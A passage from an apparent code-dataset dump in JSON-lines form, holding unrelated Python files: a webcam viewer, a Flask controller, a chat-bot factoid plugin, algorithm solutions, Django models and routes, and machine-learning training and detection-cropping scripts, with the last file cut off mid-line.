evaluate(self, dataset, name):\n all_data = list()\n for data in dataset:\n predicts = self._predict_op(data)\n all_data.append((data[\"labels\"], predicts, data[\"words\"], data[\"seq_len\"]))\n return self.evaluate_f1(all_data, self.rev_word_dict, self.rev_label_dict, name)\n","sub_path":"lavd/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19162620","text":"#!/usr/bin/env python\nimport cv2\n\n\"\"\"This program exists to show the syntax used by OpenCV to capture\nand display a camera feed to a window\"\"\"\n\ndef display_webcam():\n # capturing video from camera, storing in 'cap'. 0 selects the camera\n\n cap = cv2.VideoCapture(0)\n\n while True:\n # frame gets the next frame in the camera via cap\n # ret is a boolean for success of capturing frame\n ret, frame = cap.read()\n print(type(frame))\n cv2.imshow('This is a window!!', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n print('Quit key pressed')\n break\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n display_webcam()\n","sub_path":"video_display.py","file_name":"video_display.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576948767","text":"from json import dumps, loads\nfrom models.campaign import Campaign\nfrom flask_restplus import reqparse\n\nclass CampaignController:\n def __init__(self, request):\n self.request = request\n\n def new(self):\n\n parser = reqparse.RequestParser()\n parser.add_argument('name', required=True)\n parser.add_argument('gameMaster', required=True)\n parser.add_argument('players', action='append')\n parser.add_argument('characters', action='append')\n parser.add_argument('rules', action='append')\n parse_result = parser.parse_args(req=self.request)\n\n campaign = Campaign.from_json(dumps(parse_result)).save()\n\n return \"{}\".format(campaign.id)\n\n @staticmethod\n def list():\n list_of_campaigns = list(map(lambda campaign: loads(campaign.to_json()), Campaign.objects.all()))\n return list_of_campaigns\n\n @staticmethod\n def get_element_detail(identifier):\n return Campaign.objects.get(id=identifier).to_json()\n \n def edit(self, identifier):\n campaign = Campaign.objects.get(id=identifier)\n parser = reqparse.RequestParser()\n parser.add_argument('name', required=False)\n parser.add_argument('gameMaster', required=False)\n parser.add_argument('players', required=False)\n parser.add_argument('characters', required=False)\n parser.add_argument('rules', required=False)\n parse_result = parser.parse_args(req=self.request)\n\n filtered_result = {k: v for k, v in parse_result.items() if v is not None}\n \n no_docs_updated = campaign.update(**filtered_result)\n\n if no_docs_updated == 1:\n new_campaign = Campaign.objects.get(id=identifier)\n return loads(new_campaign.to_json())\n \n @staticmethod\n def delete(id):\n target = Campaign.objects.get(id=id)\n target_data = loads(target.to_json())\n target.delete()\n\n return target_data","sub_path":"services/campaigns/controller/campaign_controller.py","file_name":"campaign_controller.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"57417407","text":"#Don't care if factoids isn't a word.\n#Enjoy the plugin!\n#TODO Implement \"|\"\n#TODO Restructure to detect who set the factoid, and maybe to 
support additional information\nplugName = 'Factoids'\n\nfact_prefix = '\\''\nfact_setPermissions = 0 #Permissions required to set factoids\nfact_usePermissions = 0 #Permissions required to use set factoids\n\ndef fact_isValid(msg, protocol):\n if len(msg) < 9:\n return 'Factoid too short.'\n elif msg[:7] != '<reply>':\n if protocol == 'irc' or protocol == 'furc':\n if msg[:8] == '<action>':\n return True\n else:\n return 'Factoid doesn\\'t begin with \"<reply>\" or \"<action>\".'\n else:\n return 'Factoid doesn\\'t begin with \"<reply>\".'\n return True\n\ndef fact_getResponse(msg, protocol):\n if msg[:7] != '<reply>' and msg[:8] == '<action>':\n if protocol == 'irc':\n return '\\x01ACTION ' + msg[8:] + '\\x01'\n elif protocol == 'furc':\n return ':' + msg[8:]\n else:\n return msg[7:]\n return False\n\ndef fact_remember(inMSG):\n if getPermission(inMSG) < fact_setPermissions:\n return\n\n splitMSG = inMSG[0].split(None, 2)\n if len(splitMSG) != 3:\n return\n\n conn = sqlite3.connect(dbLoc)\n\n if getSetting('Facts', splitMSG[1], conn):\n conn.close()\n return 'Factoid \"'+splitMSG[1]+'\" already exists.'\n\n validResponse = fact_isValid(splitMSG[2], inMSG[1])\n\n if validResponse != True:\n conn.close()\n return validResponse\n\n setSetting('Facts', splitMSG[1], (splitMSG[2],), ('Value',), conn)\n conn.close()\n return '\"'+splitMSG[1]+'\" added.'\n\ndef fact_forget(inMSG):\n if getPermission(inMSG) < fact_setPermissions:\n return\n\n splitMSG = inMSG[0].split()\n if len(splitMSG) != 2:\n return\n\n if not delSetting('Facts', splitMSG[1]):\n return 'Error deleting \"'+splitMSG[1]+'\" (Probably doesn\\'t exist).'\n\n return '\"'+splitMSG[1]+'\" deleted.'\n\ndef fact_replace(inMSG):\n if getPermission(inMSG) < fact_setPermissions:\n return\n\n splitMSG = inMSG[0].split(None, 2)\n if len(splitMSG) != 3:\n return\n\n conn = sqlite3.connect(dbLoc)\n\n if not getSetting('Facts', splitMSG[1], conn):\n conn.close()\n return 'Factoid \"'+splitMSG[1]+'\" does not exist.'\n\n validResponse = fact_isValid(splitMSG[2], inMSG[1])\n\n if validResponse != True:\n conn.close()\n return validResponse\n\n setSetting('Facts', splitMSG[1], (splitMSG[2],), ('Value',), conn)\n conn.close()\n return '\"'+splitMSG[1]+'\" replaced.'\n\ndef fact_getFact(inMSG):\n if (not inMSG or len(inMSG) != 6 or getPermission(inMSG) < fact_usePermissions or\n len(inMSG[0]) < len(fact_prefix)+1 or inMSG[0][:len(fact_prefix)] != fact_prefix):\n return\n\n splitMSG = inMSG[0].split()\n if len(splitMSG) > 2:\n return\n elif len(splitMSG) == 2:\n who = splitMSG[1]\n else:\n who = inMSG[4]\n \n fact = getSetting('Facts', splitMSG[0][len(fact_prefix):])\n\n if fact:\n validResponse = fact_isValid(fact[0][1], inMSG[1])\n else:\n return\n\n if validResponse != True:\n sendMSG(validResponse, inMSG[1], inMSG[2], inMSG[3])\n return\n\n validResponse = fact_getResponse(fact[0][1], inMSG[1])\n\n if validResponse:\n sendMSG(validResponse.replace('$inp$', who), inMSG[1], inMSG[2], inMSG[3])\n\ndef load():\n global funcs\n funcs = dict(list(funcs.items()) + [('rem',fact_remember), ('rep',fact_replace), ('f',fact_forget)])\n return fact_getFact\n","sub_path":"3.4/plugins/factoids.py","file_name":"factoids.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115622866","text":"import sys\n\n# Binary search, O(log n)\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n length = 
len(nums1) + len(nums2)\n if length&0x1 == 1:\n return self.findKth(nums1, nums2, length/2+1)\n else:\n n1 = self.findKth(nums1, nums2, length/2+1)\n n2 = self.findKth(nums1, nums2, length/2)\n return (n1 + n2)/2.0\n\n def findKth(self, nums1, nums2, k):\n if len(nums1) > len(nums2):\n return self.findKth(nums2, nums1, k)\n if not nums1:\n return nums2[k-1]\n if k == 1:\n return min(nums1[0], nums2[0])\n in1 = min(len(nums1), k/2)\n in2 = k - in1\n if nums1[in1-1] == nums2[in2-1]:\n return nums1[in1-1]\n elif nums1[in1-1] < nums2[in2-1]:\n return self.findKth(nums1[in1:], nums2, k-in1)\n else:\n return self.findKth(nums1, nums2[in2:], k-in2)\n\n# Two-way merge, O(n)\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n nums = self.merge(nums1, nums2)\n length = len(nums)\n if length%2 == 0:\n return (nums[length/2] + nums[length/2 -1])/2.0\n else:\n return nums[length/2]\n \n def merge(self, nums1, nums2):\n nums, length = [], len(nums1) + len(nums2)\n index1, index2 = 0, 0\n nums1.append(sys.maxint)\n nums2.append(sys.maxint)\n for i in range(length):\n if nums1[index1] < nums2[index2]:\n nums.append(nums1[index1])\n index1 += 1\n else:\n nums.append(nums2[index2])\n index2 += 1\n return nums\n","sub_path":"004_Median_of_Two_Sorted_Arrays/median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"187709053","text":"from django.conf.urls import url, include\nfrom django.contrib.auth import views as auth_views\n\nfrom adminio.views import *\n\nurlpatterns = [\n url(r'^$', index, name=\"index\"),\n # (r\"^media/(.+)\", static.serve, {\"document_root\": settings.MEDIA_ROOT}),\n url(r'^login/$', login_view),\n url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name=\"logout\"),\n\n url(r'^journal/$', journal, name='journal'),\n url(r'^journal/object/$', object_journal, name='object_journal'),\n url(r'^journal/([^/]+)/$', journal_event, name='journal_record'),\n\n url(r'^global_groups/$', global_groups, name='global_groups'),\n url(r'^global_groups/add/$', global_group_edit, name='global_group_add'),\n url(r'^global_groups/([^/]+)/edit/$', global_group_edit, name='global_group_edit'),\n\n]\n","sub_path":"adminio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575616296","text":"''' Test identifying faces for a POLYDATA model.\n'''\nimport sv\nimport sys\nimport vtk\nsys.path.insert(1, '../graphics/')\nimport graphics as gr\n\n## Create renderer and graphics window.\nwin_width = 500\nwin_height = 500\nrenderer, renderer_window = gr.init_graphics(win_width, win_height)\n\n## Create a modeler.\nfile_name = \"../data/models/cylinder.stl\"\nfile_name = \"../data/DemoProject/Models/demo.vtp\"\nmodeler = sv.modeling.Modeler(sv.modeling.Kernel.POLYDATA)\nmodel = modeler.read(file_name)\nprint(\"Model type: \" + str(type(model)))\n\n## Compute model face IDs for STL file.\nif 'stl' in file_name:\n face_ids = model.compute_boundary_faces(angle=60.0)\nface_ids = model.get_face_ids()\nprint(\"Number of model Face IDs: {0:d}\".format(len(face_ids)))\n#print(\"Model Face IDs: {0:s}\".format(str(face_ids)))\n\n## Identify the model face caps.\nface_caps = model.identify_caps()\n#print(face_types)\n\n## Show the 
caps.\nnum_caps = 0\nfor face_id,is_cap in zip(face_ids, face_caps):\n face_polydata = model.get_face_polydata(face_id=face_id)\n if is_cap:\n gr.add_geometry(renderer, face_polydata, color=[1.0, 0.0, 0.0], wire=False)\n num_caps += 1\n else:\n gr.add_geometry(renderer, face_polydata, color=[0.0, 1.0, 0.0], wire=False)\n\nprint(\"Number of caps: \" + str(num_caps))\n\n# Display window.\ngr.display(renderer_window)\n\n","sub_path":"new-api-tests/modeling/identify-faces-polydata.py","file_name":"identify-faces-polydata.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277814325","text":"from django.db import connection, models\nfrom django.db.models import F\nfrom django.db.models.signals import m2m_changed\nfrom django.dispatch import receiver\nfrom django.utils.translation import ugettext_lazy as _\nfrom future.builtins import super\nfrom mezzanine.conf import settings\n\nfrom ffcsa.shop.models import Product, ProductVariation\nfrom ffcsa.shop.models.Discount import Discount\n\n\nclass Sale(Discount):\n \"\"\"\n Stores sales field values for price and date range which when saved\n are then applied across products and variations according to the\n selected categories and products for the sale.\n \"\"\"\n\n class Meta:\n verbose_name = _(\"Sale\")\n verbose_name_plural = _(\"Sales\")\n\n def save(self, *args, **kwargs):\n super(Sale, self).save(*args, **kwargs)\n self.update_products()\n\n def update_products(self):\n \"\"\"\n Apply sales field value to products and variations according\n to the selected categories and products for the sale.\n \"\"\"\n self._clear()\n if self.active:\n extra_filter = {}\n if self.discount_deduct is not None:\n # Don't apply to prices that would be negative\n # after deduction.\n extra_filter[\"unit_price__gt\"] = self.discount_deduct\n sale_price = models.F(\"unit_price\") - self.discount_deduct\n elif self.discount_percent is not None:\n sale_price = models.F(\"unit_price\") - (\n F(\"unit_price\") / \"100.0\" * self.discount_percent)\n elif self.discount_exact is not None:\n # Don't apply to prices that are cheaper than the sale\n # amount.\n extra_filter[\"unit_price__gt\"] = self.discount_exact\n sale_price = self.discount_exact\n else:\n return\n products = self.all_products()\n variations = ProductVariation.objects.filter(product__in=products)\n for priced_objects in (products, variations):\n update = {\"sale_id\": self.id,\n \"sale_price\": sale_price,\n \"sale_to\": self.valid_to,\n \"sale_from\": self.valid_from}\n using = priced_objects.db\n if \"mysql\" not in settings.DATABASES[using][\"ENGINE\"]:\n priced_objects.filter(**extra_filter).update(**update)\n else:\n # Work around for MySQL which does not allow update\n # to operate on subquery where the FROM clause would\n # have it operate on the same table, so we update\n # each instance individually: http://bit.ly/1xMOGpU\n #\n # Also MySQL may raise a 'Data truncated' warning here\n # when doing a calculation that exceeds the precision\n # of the price column. 
In this case it's safe to ignore\n # it and the calculation will still be applied, but\n # we need to massage transaction management in order\n # to continue successfully: http://bit.ly/1xMOJCd\n for priced in priced_objects.filter(**extra_filter):\n for field, value in list(update.items()):\n setattr(priced, field, value)\n try:\n priced.save()\n except Warning:\n connection.set_rollback(False)\n\n def delete(self, *args, **kwargs):\n \"\"\"\n Clear this sale from products when deleting the sale.\n \"\"\"\n self._clear()\n super(Sale, self).delete(*args, **kwargs)\n\n def _clear(self):\n \"\"\"\n Clears previously applied sale field values from products prior\n to updating the sale, when deactivating it or deleting it.\n \"\"\"\n update = {\"sale_id\": None, \"sale_price\": None,\n \"sale_from\": None, \"sale_to\": None}\n for priced_model in (Product, ProductVariation):\n priced_model.objects.filter(sale_id=self.id).update(**update)\n\n\n@receiver(m2m_changed, sender=Sale.products.through)\ndef sale_update_products(sender, instance, action, *args, **kwargs):\n \"\"\"\n Signal for updating products for the sale - needed since the\n products won't be assigned to the sale when it is first saved.\n \"\"\"\n if action == \"post_add\":\n instance.update_products()\n","sub_path":"ffcsa/shop/models/Sale.py","file_name":"Sale.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"372441928","text":"n,m=map(int,input().split())\nab=[]\nfor i in range(m):\n ab.append(list(map(int,input().split())))\n\nans=0\ndef dfs(start,finish):\n global ans\n finish.add(start)# nodes already visited\n # print(finish)\n if len(finish)==n:# stop once every vertex has been reached\n ans+=1# this edge is not a bridge\n return \n for i in adlist[start-1]:\n\n if i not in finish:# not visited yet, so we can move there \n dfs(i,finish)\n\nfor i in range(m):\n adlist=[]\n for h in range(n): \n adlist.append([])\n for j in range(m):\n if i!=j:\n x=ab[j][0]\n y=ab[j][1]\n adlist[x-1].append(y)\n adlist[y-1].append(x)\n finish=set()\n #print(adlist)\n dfs(1,finish)# DFS from vertex 1 with edge i removed\n \n#print(adlist)\n\nprint(m-ans)\n\n\"\"\"\nFor each of the m edges, remove it and run a DFS to check whether every\nvertex is still reachable; repeat this m times.\nNote that we must remove edges, not vertices, so on every iteration the\nadjacency list is rebuilt without edge i.\nEdges whose removal disconnects the graph are bridges, so the answer is\nm minus the number of removals that keep the graph connected.\n\"\"\"","sub_path":"ABC/75/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"618105934","text":"import h5py\nimport numpy as np\nfrom i3d_inception import Inception_Inflated3d\nimport keras\nfrom keras import optimizers\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, CSVLogger\nfrom keras.preprocessing.image import ImageDataGenerator\n\nFRAME_HEIGHT = 224\nFRAME_WIDTH = 224\nNUM_FRAMES = 118\nNUM_CLASSES = 10\nBATCH = 4\n\n#Training I3D: freeze the first 5 inception modules, transfer learning from ImageNet and Kinetics\n\nhf = h5py.File(\"sibi_rgb_normal.h5\",\"r\")\ntrain_label_file = open(\"train_sibi_1.txt\",\"r\")\ntest_label_file = open(\"test_validation_sibi_1.txt\",\"r\")\nvalidation_label_file = open(\"test_validation_sibi_1.txt\",\"r\")\ntrain_raw_labels = train_label_file.read().split(\"\\n\")\ntest_raw_labels = test_label_file.read().split(\"\\n\")\nvalidation_raw_labels = validation_label_file.read().split(\"\\n\")\ntrain_labels = keras.utils.to_categorical(np.array(train_raw_labels),num_classes = NUM_CLASSES)\ntest_labels = keras.utils.to_categorical(np.array(test_raw_labels),num_classes = NUM_CLASSES)\nvalidation_labels = 
keras.utils.to_categorical(np.array(validation_raw_labels),num_classes = NUM_CLASSES)\n\n\ndef generator(type):\n i=0\n counter = 0\n if type==\"train\":\n while True:\n batch_features = np.zeros((BATCH,NUM_FRAMES, FRAME_WIDTH, FRAME_HEIGHT,3))\n batch_labels = np.zeros((BATCH,NUM_CLASSES))\n for i in range(BATCH):\n batch_features[i] = hf[\"train\"][counter%120]\n batch_labels[i] = train_labels[counter%120]\n # print(\"Index: \"+str(i)+\", Counter: \"+str(counter))\n # print(batch_labels)\n counter+=1\n yield batch_features,batch_labels\n elif type==\"test\":\n while True:\n batch_features = np.zeros((1,NUM_FRAMES, FRAME_WIDTH, FRAME_HEIGHT,3))\n batch_labels = np.zeros((1,NUM_CLASSES))\n for i in range(1):\n batch_features[i] = hf[\"test\"][counter%40]\n batch_labels[i] = test_labels[counter%40]\n # print(\"Index: \"+str(i))\n # print(batch_labels)\n counter+=1\n yield batch_features,batch_labels\n elif type==\"validation\":\n while True:\n batch_features = np.zeros((BATCH,NUM_FRAMES, FRAME_WIDTH, FRAME_HEIGHT,3))\n batch_labels = np.zeros((BATCH,NUM_CLASSES))\n for i in range(BATCH):\n batch_features[i] = hf[\"validation\"][counter%40]\n batch_labels[i] = validation_labels[counter%40]\n # print(\"Index: \"+str(i))\n # print(batch_labels)\n counter+=1\n yield batch_features,batch_labels\n\nrgb_model = Inception_Inflated3d(\n include_top=False,\n weights='rgb_imagenet_and_kinetics',\n input_shape=(NUM_FRAMES, FRAME_HEIGHT, FRAME_WIDTH,3),\n classes=NUM_CLASSES,endpoint_logit=False)\n\nopt = optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=1e-6)\n\nindex_freeze_layer = [1,2,3,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,32,33,34,35,36,37,39,40,41,42,43,44,45,46,47,48,49,50,53,54,55,56,57,58,60,61,62,63,64,65,66,67,68,69,70,71,73,74,75,76,77,78,80,81,82,83,84,85,86,87,88,89,90,91,93,94,95,96,97,98,100,101,102,103,104,105,106,107,108,109,110,111]\ncc = 0\nfor layer in rgb_model.layers:\n print(\"Layer - \"+str(cc)+\" \"+layer.name)\n if cc in index_freeze_layer:\n print(\"jadi false\")\n layer.trainable = False\n print(\"Trainable = \"+str(layer.trainable)+\"\\n\")\n cc+=1\n\nrgb_model.summary()\n\nrgb_model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=opt,\n metrics=['accuracy'])\n\nbest_checkpoint = ModelCheckpoint('sibi_rgb_normal_4_weights_best.hdf5', monitor='val_acc', verbose=1, save_best_only=True, mode='max')\ncheckpoint = ModelCheckpoint('sibi_rgb_normal_4_weights_epoch.hdf5', monitor='val_acc', verbose=1, save_best_only=False, mode='max')\ncsv_logger = CSVLogger('sibi_rgb_normal_4.log', append=False)\ntensorboard = TensorBoard(log_dir='./sibi_rgb_normal_4_tf-logs')\ncallbacks_list = [checkpoint,best_checkpoint, csv_logger, tensorboard]\n\n\n# len(hf[\"train\"])\n# len(hf[\"validation\"])\n# rgb_model.fit_generator(generator(\"train\"), steps_per_epoch=120//BATCH, epochs=200, callbacks=callbacks_list,shuffle=True,validation_data = generator(\"validation\"),validation_steps=40//BATCH)\n\n# score = rgb_model.predict_generator(generator(\"test\"),steps=40)\n# np.save(\"sibi_rgb_normal_result_4\",score)\n# print('Test loss:', score[0])\n# print('Test accuracy:', score[1])\n\nhf.close()\n","sub_path":"train_sibi_rgb_normal_4.py","file_name":"train_sibi_rgb_normal_4.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252661166","text":"class A:\n classvar1 = \"I am a class variable in class A\"\n def __init__(self):\n 
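# Instance attributes set below shadow the class attribute of the same name.\n 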
self.var1 = \"I am inside class A constructor\"\n self.classvar1 = \"Instance variable in class A\"\n self.special = \"Special\"\n\nclass B(A):\n classvar1 = \"I am in class B\"\n def __init__(self):\n #super().__init__() # Using super class here prints var1 and classvar1 values as mentioned inside class B constructor as the values are overwritten when class B runs\n self.var1 = \"I am inside class B constructor\"\n self.classvar1 = \"Instance variable in class B\"\n super().__init__() # Using super class here prints var1 and classvar1 values as mentioned inside class A constructor as the class A already ran above.\n\n\na = A()\nb = B()\nprint(b.special, b.var1, b.classvar1)\n\n","sub_path":"11c. Super() and Overriding.py","file_name":"11c. Super() and Overriding.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"622296111","text":"# Batch file for applying an object detection graph to a COCO style dataset,\n# cropping images to the detected animals inside and creating a COCO-\n# style classification dataset out of it. It also saves the detections \n# to a file using pickle\n\nimport numpy as np\nimport os\nimport tqdm\nimport pickle\nimport matplotlib; matplotlib.use('Agg')\nfrom pycocotools.coco import COCO\nfrom PIL import Image\nimport argparse\nimport random\nimport json\nimport sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)),\n '../../tfrecords/utils'))\nif sys.version_info.major >= 3:\n import create_tfrecords_py3 as tfr\nelse:\n import create_tfrecords as tfr\nimport uuid\n\nprint('If you run into import errors, please make sure you added \"models/research\" and ' +\\\n ' \"models/research/object_detection\" of the tensorflow models repo to the PYTHONPATH\\n\\n')\nimport tensorflow as tf\nfrom object_detection.utils import ops as utils_ops\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\nfrom distutils.version import StrictVersion\nif StrictVersion(tf.__version__) < StrictVersion('1.9.0'):\n raise ImportError('Please upgrade your TensorFlow installation to v1.9.* or later!')\n\n\n########################################################## \n### Configuration\n\n# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_FROZEN_GRAPH` to point to a new .pb file. \nparser = argparse.ArgumentParser()\nparser.add_argument(\"input_json\", type=str, default='CaltechCameraTraps.json',\n help='COCO style dataset annotation')\nparser.add_argument('image_dir', type=str, default='./images/cct_images',\n help='Root folder of the images, as used in the annotations file')\nparser.add_argument('frozen_graph', type=str, default='frozen_inference_graph.pb',\n help='Frozen graph of detection network as create by export_inference_graph.py of TFODAPI.')\n#parser.add_argument('detections_output', type=str, default='detections_final.pkl',\n# help='Pickle file with the detections, which can be used for cropping later on.')\n\nparser.add_argument('--coco_style_output', type=str, default=None,\n help='Output directory for a dataset in COCO format.')\nparser.add_argument('--tfrecords_output', type=str, default=None,\n help='Output directory for a dataset in TFRecords format.')\nparser.add_argument('--location_key', type=str, default='location', metavar='location',\n help='Key in the image-level annotations that specifies the splitting criteria. 
' + \\\n 'Usually we split camera-trap datasets by locations, i.e. training and testing locations. ' + \\\n 'In this case, you probably want to pass something like `--location_key location`. ' + \\\n 'The script prints the annotation of a randomly selected image which you can use for reference.')\n\nparser.add_argument('--exclude_categories', type=str, nargs='+', default=[],\n help='Categories to ignore. We will not run detection on images of that category and will ' + \\\n 'not use them for the classification dataset.')\nparser.add_argument('--use_detection_file', type=str, default=None,\n help='Uses existing detections from a file generated by this script. You can use this ' + \\\n 'to continue a partially processed dataset. ')\nparser.add_argument('--detection_threshold', type=float, default=0.5,\n help='Threshold for detections to use. Default is 0.5.')\nparser.add_argument('--padding_factor', type=float, default=1.3*1.3,\n help='We will crop a tight square box around the animal enlarged by this factor. ' + \\\n 'Default is 1.3 * 1.3 = 1.69, which accounts for the cropping at test time and for' + \\\n ' a reasonable amount of context')\nparser.add_argument('--test_fraction', type=float, default=0.2,\n help='Proportion of the locations used for testing, should be in [0,1]. Default: 0.2')\nparser.add_argument('--ims_per_record', type=int, default=200,\n help='Number of images to store in each tfrecord file')\nargs = parser.parse_args()\n\n\n##########################################################\n### The actual code\n\n# Check arguments\nINPUT_JSON = args.input_json\nassert os.path.exists(INPUT_JSON), INPUT_JSON + ' does not exist'\nIMAGE_DIR = args.image_dir\nassert os.path.exists(IMAGE_DIR), IMAGE_DIR + ' does not exist'\n# /ai4edevfs/models/object_detection/faster_rcnn_inception_resnet_v2_atrous/megadetector/frozen_inference_graph.pb\nPATH_TO_FROZEN_GRAPH = args.frozen_graph\nCOCO_OUTPUT_DIR = args.coco_style_output\nTFRECORDS_OUTPUT_DIR = args.tfrecords_output\nassert COCO_OUTPUT_DIR or TFRECORDS_OUTPUT_DIR, 'Please provide either --coco_style_output or --tfrecords_output'\nif COCO_OUTPUT_DIR:\n DETECTION_OUTPUT = os.path.join(COCO_OUTPUT_DIR, 'detections_final.pkl')\nelse:\n DETECTION_OUTPUT = os.path.join(TFRECORDS_OUTPUT_DIR, 'detections_final.pkl')\n\nDETECTION_INPUT = args.use_detection_file\nif DETECTION_INPUT:\n assert os.path.exists(DETECTION_INPUT), DETECTION_INPUT + ' does not exist'\n\nSPLIT_BY = args.location_key\nEXCLUDED_CATEGORIES = args.exclude_categories\n\n# Detection threshold should be in [0,1]\nDETECTION_THRESHOLD = args.detection_threshold\nassert DETECTION_THRESHOLD >= 0 and DETECTION_THRESHOLD <= 1, 'Detection threshold should be in [0,1]'\n\n# Padding around the detected objects when cropping\n# 1.3 for the cropping during test time and 1.3 for \n# the context that the CNN requires in the left-over \n# image\nPADDING_FACTOR = args.padding_factor\nassert PADDING_FACTOR >= 1, 'Padding factor should be equal to or larger than 1'\n\n# Fraction of locations used for testing\nTEST_FRACTION = args.test_fraction\nassert TEST_FRACTION >= 0 and TEST_FRACTION <= 1, 'test_fraction should be a value in [0,1]'\n\nIMS_PER_RECORD = args.ims_per_record\nassert IMS_PER_RECORD > 0, 'The number of images per shard should be greater than 0'\n\nTMP_IMAGE = str(uuid.uuid4()) + '.jpg'\n\n# Create output directories\nif COCO_OUTPUT_DIR and not os.path.exists(COCO_OUTPUT_DIR):\n print('Creating COCO-style dataset output directory.')\n os.makedirs(COCO_OUTPUT_DIR)\nif TFRECORDS_OUTPUT_DIR and 
not os.path.exists(TFRECORDS_OUTPUT_DIR):\n print('Creating TFRecords output directory.')\n os.makedirs(TFRECORDS_OUTPUT_DIR)\nif not os.path.exists(os.path.dirname(DETECTION_OUTPUT)):\n print('Creating output directory for detection file.')\n os.makedirs(os.path.dirname(DETECTION_OUTPUT))\n\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\ngraph = detection_graph\n\n# Load COCO style annotations from the input dataset\ncoco = COCO(INPUT_JSON)\n\n# Get all categories, their names, and create an updated ID for the json file \ncategories = coco.loadCats(coco.getCatIds())\ncat_id_to_names = {cat['id']:cat['name'] for cat in categories}\ncat_id_to_new_id = {old_key:idx for idx,old_key in enumerate(cat_id_to_names.keys())}\nprint('All categories: \\n\"{}\"\\n'.format('\", \"'.join(cat_id_to_names.values())))\nfor ignore_cat in EXCLUDED_CATEGORIES:\n assert ignore_cat in cat_id_to_names.values(), 'Category %s does not exist in the dataset'%ignore_cat\n\n\n# Prepare the coco-style json files\ntraining_json = dict(images=[], categories=[], annotations=[])\ntest_json = dict(images=[], categories=[], annotations=[])\n\nfor old_cat_id in cat_id_to_names.keys():\n training_json['categories'].append(dict(id = cat_id_to_new_id[old_cat_id], \n name=cat_id_to_names[old_cat_id],\n supercategory='entity'))\ntest_json['categories'] = training_json['categories']\n\n# Split the dataset by locations\nrandom.seed(0)\nprint('Example of the annotation of a single image:')\nprint(list(coco.imgs.items())[0])\nprint('The corresponding category annotation:')\nprint(coco.imgToAnns[list(coco.imgs.items())[0][0]])\nlocations = set([ann[SPLIT_BY] for ann in coco.imgs.values()])\ntest_locations = sorted(random.sample(sorted(locations), max(1, int(TEST_FRACTION * len(locations)))))\ntraining_locations = sorted(list(set(locations) - set(test_locations)))\nprint('{} locations in total, {} will be used for training, {} for testing'.format(len(locations), \n len(training_locations),\n len(test_locations)))\nprint('Training uses locations ', sorted(training_locations))\nprint('Testing uses locations ', sorted(test_locations))\n\n# Load detections\nif DETECTION_INPUT:\n print('Loading existing detections from ' + DETECTION_INPUT)\n with open(DETECTION_INPUT, 'rb') as f:\n detections = pickle.load(f)\nelse:\n detections = dict()\n\n# TFRecords variables\nclass TFRecordsWriter(object):\n def __init__(self, output_file, ims_per_record):\n self.output_file = output_file\n self.ims_per_record = ims_per_record\n self.next_shard_idx = 0\n self.next_shard_img_idx = 0\n self.coder = tfr.ImageCoder()\n self.writer = None\n\n def add(self, data):\n if self.next_shard_img_idx % self.ims_per_record == 0:\n if self.writer:\n self.writer.close()\n self.writer = tf.python_io.TFRecordWriter(self.output_file%self.next_shard_idx)\n self.next_shard_idx = self.next_shard_idx + 1\n image_buffer, height, width = tfr._process_image(data['filename'], self.coder)\n example = tfr._convert_to_example(data, image_buffer, data['height'], data['width'])\n self.writer.write(example.SerializeToString())\n self.next_shard_img_idx = self.next_shard_img_idx + 1\n\n def close(self):\n if self.next_shard_idx == 0 and self.next_shard_img_idx == 0:\n print('WARNING: No images were written to 
